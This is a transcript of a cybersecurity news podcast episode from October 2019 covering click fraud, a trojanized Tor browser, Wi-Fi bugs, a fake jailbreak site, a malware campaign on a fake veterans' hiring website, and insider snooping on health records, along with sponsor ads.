The CyberWire Daily Podcast 10.18.19
Ep 952 | 10.18.19

Clickfraud and third-parties (both SDKs and stores). Trojanized TOR browser steals from Russian users. WiFi bugs. Sketchy jailbreak. Big Tech on free speech. Cooperation against terrorism.

Transcript

Dave Bittner: [00:00:03] Clickfraud arrives via third-party SDK, and the app developers who used it say they didn't know nothing. A Trojanized TOR browser warns its bros that, woah, you're out of date, and the police might see you. But it's really just stealing all the bros' alt-coins Wi-Fi bugs are fixed in Kindle and Alexa. Don't try to jailbreak your iPhone from a sketchy Checkrain site. Two big tech companies take different directions on free speech. And Russia gets an assist from Uncle Sam. 

Dave Bittner: [00:00:38]  And now a word from our sponsor LookingGlass Cyber. Organizations have been playing a dangerous game of cyber Jenga, stacking disparate security tools, point solutions and boxes one on top of the other, hoping to improve their security posture. Its convoluted and overloaded security stack can't hold up in today's micro-segmented, borderless and distributed networks. As the enterprise network grows, organizations need a flexible protection around their unique network ecosystems. By weaving security into the investments your organization has already made, formerly disjointed tools can communicate with one another to disrupt and distract the adversary without revealing your defenses. With a software-based approach to unifying your security stack, security teams can easily scale the protection to fit their needs, with one integrated software solution requiring no specialty hardware. Meet the Aeonik Security Fabric. Learn more at lookingglasscyber.com. That's lookingglasscyber.com. And we thank LookingGlass Cyber for sponsoring our show. 

Dave Bittner: [00:01:47]  Funding for this CyberWire podcast is made possible in part by McAfee, security built by the power of harnessing 1 billion threat sensors from device to cloud, intelligence that enables you to respond to your environment and insights that empower you to change it. McAfee, the device-to-cloud cybersecurity company. Go to mcafee.com/insights. 

Dave Bittner: [00:02:09]  From the CyberWire studios at DataTribe, I'm Dave Bittner with your CyberWire summary for Friday, October 18, 2019. 

Dave Bittner: [00:02:18]  Upstream says it's caught the popular Android app Snaptube engaged in large-scale click fraud. TechCrunch says that Snaptube has some 40 million users who employ it to download video and music from major video sites like YouTube and Facebook. Users receive silent ads that run in the background, racking up clicks that, while remaining invisible to the user, drain device battery and goose Snaptube ad click rates. More seriously, they also purchase premium digital services, also silently and in the background. Upstream says it's blocked more than 70 million suspicious requests from almost 4 1/2 million unique devices over a six-month period. 

Dave Bittner: [00:03:00]  Snaptube isn't offered in Google Play but is instead downloaded from third-party app stores. The problem appears to lie in malicious code embedded in a third-party software development kit Snaptube uses. This code, known as Mango, had earlier been implicated in a click fraud campaign involving Vidmate, another downloader app accused of ad fraud back in May. 

Dave Bittner: [00:03:23]  For its part, Mobiuspace was shocked, shocked, to learn that click fraud was going on. And they say they're considering legal action against Mango's developers. This incident illustrates at least two things. First, while official stores aren't perfect, they're usually a better security bet than third-party app stores. And anyway, perfection is an unreasonable standard, even for Google Play. Second, it illustrates the problem of software supply chain security. It's not the first time Snaptube has been the object of complaints about click fraud. Sophos reported finding it back in February. And later this year, some Android devices began flagging it as containing suspicious code. The ease of using SDKs may be a fatal temptation, assuming, of course, that claiming the SDK ate my brand reputation isn't a dot-com equivalent of the dog ate my homework. 

Dave Bittner: [00:04:16]  ESET describes a Trojanized TOR browser that warns victims that they're vulnerable to police snooping because their browser is out of date. The bogus update page to which the unwary are redirected installs malware that enables the crooks to steal cryptocurrency - mostly Qiwi, but some bitcoin as well. The caper is conducted in Russian and is directed against Russian-speaking visitors to various darknet sites. Many of these sites - but we'll hasten to add not all of them - are likely to be the home of nastiness and contraband likely to give visitors an uneasy conscience. 

Dave Bittner: [00:04:52]  The warning page goes for a chummy, one-dude-to-another tone, not the sort of we see what you're up to manner that's so often associated with scareware. For example, it addresses the victim as bro and offers a sympathetic fix to keep the militia off their back. And it's worth recalling here that the victims are Russian speakers. For all the news of Russian hacking we see, there are plenty of Russian victims in cyberspace, too. 

Dave Bittner: [00:05:17]  ESET has also reported that older and unpatched versions of Amazon's Kindle and Echo are vulnerable to key reinstallation attacks that exploit Wi-Fi vulnerabilities to achieve man-in-the-middle status that could enable a range of bad activities, from snooping to distributed denial-of-service. The method of attack is the KRACK approach discovered in 2017, which takes advantage of endemic issues in the WPA2 standard. Users should note first that Amazon has patched the problems, so they should update their devices. And second, the vulnerability, as is almost always the case with Wi-Fi issues, is one that's exploitable only at close range. Nonetheless, Alexa, go update yourself. 

Dave Bittner: [00:06:01]  People who are for reasons of their own enthusiasm about jailbreaking their iPhones have been interested in Checkra1n, a jailbreak that makes use of the Checkm8 vulnerability found in some older iOS devices. They've been drawn to a site that says it's got the goods, the real deal Checkrain jailbreak. But they don't. The only thing you'll get from going there, Cisco Talos warns, is enrollment in an ad fraud campaign. 

Dave Bittner: [00:06:29]  While Apple CEO Tim Cook mollifies Chinese authorities, as WIRED and other media outlets describe, Facebook CEO Mark Zuckerberg came out swinging yesterday like a First Amendment true believer. The Telegraph and many others report that he said in an address at Georgetown University that his company is not only uninterested in returning to business in China, but that it intends to resist calls to moderate political speech. Facebook, he said, was unable to reach an accommodation with China because it's been unwilling to knuckle under to Beijing's strong position on state control or at least approval of internet content. 

Dave Bittner: [00:07:06]  Zuckerberg expressed Facebook's strong commitment to free speech as grounds for refusing to moderate political content. He argued that the Chinese government's values ought not to set the norms for the internet as a whole. He also observed with some concern that freedom of speech seemed to be under assault in the West as well, where too many people have come to believe that their political objectives are so important that opposing views should be suppressed. In any case, he said that Facebook won't censor political ads, even when they contain what its fact-checkers decide are lies. 

Dave Bittner: [00:07:39]  This week has seen a kind of quick reputational role reversal for Apple and Facebook. Apple has been famously committed to privacy, but that commitment seems to have eroded a bit in the solvent of China's repressive actions in Hong Kong. Facebook, on the other hand, which has had to master the art of apology for data mishandling, may have had a complicated relationship with privacy, but it seems now to be committed to freedom of speech. 

Dave Bittner: [00:08:05]  And finally, back to Russia. TASS is authorized to state that while the enemy of my enemy may not exactly be my friend, they could at least be maybe a helpful legal attache at the embassy. The Moscow Times has some information on U.S. assistance to Russia's FSB in a Russian domestic counterterror operation. What terrorist group was implicated isn't publicly known, but the U.S. has in the past given Russia intelligence on Islamist operations. Nevertheless, Russo-American relations in cyberspace aren't all rainbows and unicorns. Cozy Bear, after all, has resurfaced in the news. But the notes from TASS are a reminder that even opponents sometimes find common ground. 

Dave Bittner: [00:08:54]  And now a word from our sponsor, ThreatConnect. Designed by analysts but built for the entire team, ThreatConnect's intelligence-driven security operations platform is the only solution available today with intelligence, automation, analytics and workflows in a single platform. Every day, organizations worldwide use ThreatConnect as the center of their security operations to detect, respond, remediate and automate. With all of your knowledge in one place, enhanced by intelligence, enriched with analytics, driven by workflows, you'll dramatically improve the effectiveness of every member of the team. Want to learn more? Check out their newest e-book "SOAR Platforms: Everything You Need To Know About Security, Orchestration, Automation, And Response." The book talks about intelligence-driven orchestration, decreasing time to response and remediation with SOAR and ends with a checklist for a complete SOAR solution. Download it at threatconnect.com/cyberwire. That's threatconnect.com/cyberwire, and we thank ThreatConnect for sponsoring our show.

Dave Bittner: [00:10:08]  And joining me once again is Craig Williams. He's the head of Talos outreach at Cisco. Craig, it's always great to have you back. You all recently published a blog post, and it's titled How Tortoiseshell Created a Fake Veteran Hiring Web Site to Host Malware. A lot to unpack here - describe to us what's going on. 

Craig Williams: [00:10:28]  Well, this is basically, you know, another great example of an attacker finding, you know, a really clever social engineering angle to make victims become more susceptible to a traditional malware campaign. I mean, you know, if you look back on it, this is not too dissimilar from other things we've seen in the past, right? Like, you see things like attackers pretending you have a bill due, and you should immediately click and log in, right? 

Craig Williams: [00:10:53]  And so when they go for these types of emotionally charged issues - right? - be it you're going to help out heroes, you've got a bill due, you know, your password's been compromised - all those are really designed to have you react emotionally. The thought process is basically, the faster and more quickly you can react emotionally, the less likely you are to think it through, and then the bad guy is much more likely to get their way. 

Dave Bittner: [00:11:17]  Yeah. We're going to short-circuit your skepticism here. 

Craig Williams: [00:11:20]  Right. And so in this particular case, you know, the bad guys actually found, you know, a relatively convincing-sounding domain. You know, hiremilitaryheroes.com - it sounds legit, right? 

Dave Bittner: [00:11:33]  I'm surprised it was available. 

Craig Williams: [00:11:34]  It's one of those domains where a bad guy finds it, it's not taken, and so they take it, and they put up a page that looks legitimate on there. And then they just start their scam, and in this case, it was a malware campaign designed to target people who wanted to help out members of the military. 

Dave Bittner: [00:11:53]  Well, let's walk through it step-by-step. I get sent to this website. I get lured to this website. What do I see, and what happens next? 

Craig Williams: [00:12:00]  Well, you see a nice little logo, right? You see the soldiers. I think it's the D-Day picture, putting the flag up. And it's got, you know, we make America safer in red, orange and green. You know, once you go through that, it basically starts to trick you into downloading a desktop app, right? So, like, No. 1 right there - you know, don't go to a website and install their app. 

Dave Bittner: [00:12:27]  Yeah, but I could imagine if I'm somebody looking for work, I might do whatever has been asked of me here. 

Craig Williams: [00:12:34]  And that, I'm sure, is part of the thought process of impersonating a site like this. 

Dave Bittner: [00:12:39]  Yeah. 

Craig Williams: [00:12:40]  You know, but as a user of the internet, you need to realize, well, why would I need to download this app? What does it do? What permissions does it need, right? You know, do I have to install it? Can I just fill out a form? And those are the types of questions that'll probably help a user or a victim realize that maybe everything's not on the up-and-up here. 

Dave Bittner: [00:13:01]  So what does it download? And then what happens? 

Craig Williams: [00:13:03]  Well, the very first things it does is it'll try and reach out to Google. And if you basically have, you know, a tool like Little Snitch or another type of firewall that'll say, hey, you downloaded this binary from the internet. And then - Little Snitch, sorry, that's an OSX firewall. But if you had something equivalent for Windows, it would say, hey, you know, you've got a binary trying to reach out to the internet. Do you want to allow it or not? And potentially, it would stop it. And that actually would stop the malware from terminating. 

Craig Williams: [00:13:33]  So that's, you know, a traditional type of check that we've seen in a lot of software to try and determine if it's being meddled with or if it's being run in an environment where it might be subject to more analysis. So, you know, a pretty conventional check. And if that check succeeds and the malware is able to reach Google and execute normally, it installs a RAT. And that RAT basically is a reconnaissance tool. And here's the interesting part - it sends the information over email. 

Dave Bittner: [00:14:01]  Really? 

Craig Williams: [00:14:02]  That's kind of unusual, but it sends an email to a Gmail account with hardcoded credentials, actually collects a surprising amount of data. We were discussing this the other day. And, you know, a lot of times when you see reconnaissance malware, it does collect a lot of data. But it's very targeted data - right? - like, it'll collect all the MAC addresses, all the machine names and the installed programs, and then, you know, abandon ship. 

Craig Williams: [00:14:28]  With this particular campaign, I've got to wonder if maybe these attackers didn't really know what they were targeting. They just wanted as much information as possible about every machine that were possible. And so then potentially they could determine how to group the machines and then sell them off to the highest bidder. But it gathered everything. I mean, if you look in the blog post, I think we have three pages of screenshots of commands that it's harvesting the output from. 

Dave Bittner: [00:14:54]  Now the fact that it's sending off this information to an email account and there are hardcoded credentials, does that give you all the opportunity to go poke around in that email account to see how successful they've been? 

Craig Williams: [00:15:08]  That would be against U.S. law. 

Dave Bittner: [00:15:11]  I see. I'm with you. I'm with you. 

Craig Williams: [00:15:15]  (Laughter) However, if another potentially... 

Dave Bittner: [00:15:16]  But you like the way I'm thinking, right? 

Craig Williams: [00:15:18]  I love it. And I didn't say don't do it. I just (laughter) I'm not offering any sort of opinion or judgment here. Just, you know... 

Dave Bittner: [00:15:27]  (Laughter) OK, very good. Very good. 

Craig Williams: [00:15:29]  But my understanding, I've been told that it would not be a thing that we could do. 

Dave Bittner: [00:15:33]  I see. 

Craig Williams: [00:15:35]  And so, you know, while it does gather all that data, it also does maintain persistent access. So - and, you know, this is in line with them doing reconnaissance and then potentially grouping these machines through whatever thing that the, you know, potential buyer would have in common and then allowing them to take over the machine through the Remote Access Trojan. 

Dave Bittner: [00:15:55]  Wow. So do you have any sense for how widespread this is or what sort of success they're seeing? 

Craig Williams: [00:16:00]  We believe we caught it fairly early. We didn't see a ton of emails. We didn't see a lot of activity. It was actually fairly narrow. We didn't have tons of telemetry on it. So we're cautiously optimistic we caught it early. 

Dave Bittner: [00:16:12]  All right. Well, once again, the post is titled How Tortoiseshell Created a Fake Veteran's Hiring Website to Host Malware. Craig Williams, thanks for joining us. 

Craig Williams: [00:16:21]  Thank you. 

Dave Bittner: [00:16:26]  Now it's time for a few words from our sponsor, BlackBerry Cylance. You probably know all about legacy antivirus protection. It's very good as far as it goes. But you know what? The bad guys know all about it, too. It will stop the skids. But to keep this savvier hoods' hands off your endpoints, Blackberry Cylance thinks you need something better. Check out the latest version of CylanceOPTICS. It turns every endpoint into its own security operations center. CylanceOPTICS deploys algorithms formed by machine learning to offer not only immediate protection but security that's quick enough to keep up with the threat by watching, learning and acting on systems' behavior and resources. Whether you're worried about advanced malware, commodity hacking or malicious insiders, CylanceOPTICS can help. Visit cylance.com to learn more. And we thank BlackBerry Cylance for sponsoring our show. 

Dave Bittner: [00:17:26]  I recently spent some time at our local community hospital, not as a patient but keeping a family member company while they went through a bunch of tests. Everything turned out fine, by the way. But while I was there, I couldn't help noticing the number of hospital employees who came and went and how they were accessing information on the computer in our treatment room. 

Dave Bittner: [00:17:46]  I got curious about how that kind of access works. So I reached out to Caleb Barlow. He's been on our show a few times before. And he recently took on the role of CEO at Cynergistek, where they know a thing or two about monitoring health care data privacy. 

Caleb Barlow: [00:18:00]  One of the things that's very unique about health care records is that they need to be open and accessible all the time because you never know when you're going to show up at the emergency room or what pharmacy you're going to go to. You know, you've got to be able to tap into those medical records. And that's part of how we facilitate care today in the United States. 

Dave Bittner: [00:18:19]  I guess I'm imagining an ideal situation where there would be something tracking which health care professionals were actually working on me and would somehow limit that they would be the ones to have access to my records or at the very least authorize or be notified when someone who is outside of that circle of access was either accessing my records or requesting access. 

Caleb Barlow: [00:18:45]  Well, first of all, Dave, let's acknowledge that most health care professionals - in fact, the vast majority - are not only highly ethical at what they do but are as concerned about the privacy of their patients as they are their health care, right? 

Dave Bittner: [00:18:59]  That's a really good point. 

Caleb Barlow: [00:19:00]  That being said, there are a few bad apples in the bunch. And people are curious. So when you show up at the emergency room, and your neighbor who happens to be a nurse or a physician, they actually might check out why you're there. But we also found that sometimes employees are even more curious. So oftentimes we've witnessed with young doctors, residents and students, that - might use a medical record as a phone directory, a dating site or a place to even check up on that special someone and see if maybe they've got an STD in their past. The privacy of this information is really key. And there are a bunch of ways we can trigger off of the activity in that record to say, wait a second - why was this person in this record? They work in pediatrics; why are they looking at an adult record? They didn't prescribe anything. They didn't provide a note on the patient. You know, what else is going on here? 

Caleb Barlow: [00:19:59]  So I think what we're learning here can be extended across many industries. But if we look, for example, Dave, at what were some of the more common levels of unauthorized access, you know, 74% of what we find is insider snooping, meaning that it's someone within the practice that's checking up on a neighbor. That's followed by VIP and confidential patients being about 10%, co-workers being 8 percent. Neighbors, interestingly enough, are 8%. So, you know, we find people that happen to be in the same school district, and guess what? They're checking out their friends. This is happening a lot. 

Caleb Barlow: [00:20:41]  Now, to put this in perspective, let's say that you have an institution - let's say a large health care system with maybe 50,000 provisioned users, OK? So, you know, a couple dozen hospitals, pharmacies, et cetera. We'll generate 100 to 300 cases a week out of a volume of that size. And I think what we all have to realize is that this isn't just about drawing those security fences and boundaries around our data; it's also about understanding how is the data being used? And is it being used for the intended purpose? 

Dave Bittner: [00:21:16]  Now, is there a regulatory component here? I'm thinking of things like HIPAA. If you discover something like this, is there an obligation to report? 

Caleb Barlow: [00:21:26]  There is. So under HIPAA, organizations must - and I'll quote - "implement policies and procedures to prevent, detect and contain and correct security violations." HIPAA also says that you have to implement procedures to regularly review records of information system activities, such as audit logs, access reports, security incident tracking, et cetera. So yes, this is covered under HIPAA. It's also covered, in many cases, under the individual breach disclosure laws that we'll see in various states around the United States. 

Caleb Barlow: [00:21:57]  Now, here's the thing you have to keep in mind, though - it doesn't say how you have to do it. So the way this has historically been done is someone runs a report. They run a basic report and say, OK, did anybody in the hospital look up records of anyone else in the hospital and was there a reason why? As an example, right? So they maybe run that report. They find a few issues. They go investigate them. Maybe those individuals get counseled, or worst case, they get fired. But that's historically happening several months after the incident has occurred. 

Caleb Barlow: [00:22:33]  What we're doing is we're applying all the thinking that you put over at a security operations center to do this in real time using UEBA tools. And I think part of what we're learning that can be extended across the security industry is that, first of all, any time you have large volumes of private data you probably have this inappropriate access. But in addition to that, we're finding security incidents that the security teams aren't finding. So a bad guy doesn't act in a - you know, a bad guy that's intent on stealing data out of a health care record actually doesn't act like a doctor. And it shows up like a big red flare really quick. 

Caleb Barlow: [00:23:17]  And if we can catch that at the first couple of records and go, wait a second - why is this person in here coming from the outside, maybe a vendor, they've accessed 50 records all at once, they've provided no notes, no prescriptions, and it doesn't even look like they're treating the patient - why are they in there? If we can detect that at maybe the first few records and stop it, that's something the security team couldn't catch. 

Dave Bittner: [00:23:43]  So what's your recommendation here for folks who are looking to explore this? How do they get started? 

Caleb Barlow: [00:23:51]  Well, I think the big point here is we're learning that UEBA tools can be used in a totally different way - not just for security, but for monitoring privacy. And that there's probably something to be said for continuously monitoring privacy on large datasets. You know, think of not just health care but also think of all of the implications of GDPR - why wouldn't you want to be in those records, looking for those inappropriate accesses all the time? But I think, also, certainly for health care institutions, there is an important wake-up call here that we need to be monitoring this, and we need to be monitoring it in real time because, again, if we can find that problem early, we can hopefully stop the large-scale breach or correct the behavior before it really goes sideways. 

Dave Bittner: [00:24:45]  That's Caleb Barlow from Cynergistek. 

Dave Bittner: [00:24:53]  And that's the CyberWire. Thanks to all of our sponsors for making the CyberWire possible, especially our supporting sponsor, ObserveIT, the leading insider threat management platform. Learn more at observeit.com. 

Dave Bittner: [00:25:05]  The CyberWire podcast is proudly produced in Maryland out of the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technology. Our amazing CyberWire team is Stefan Vaziri, Kelsea Bond, Tim Nodar, Joe Carrigan, Carole Theriault, Nick Veliky, Bennett Moe, Chris Russell, John Petrik, Jennifer Eiben, Peter Kilpe, and I'm Dave Bittner. Thanks for listening. We'll see you tomorrow.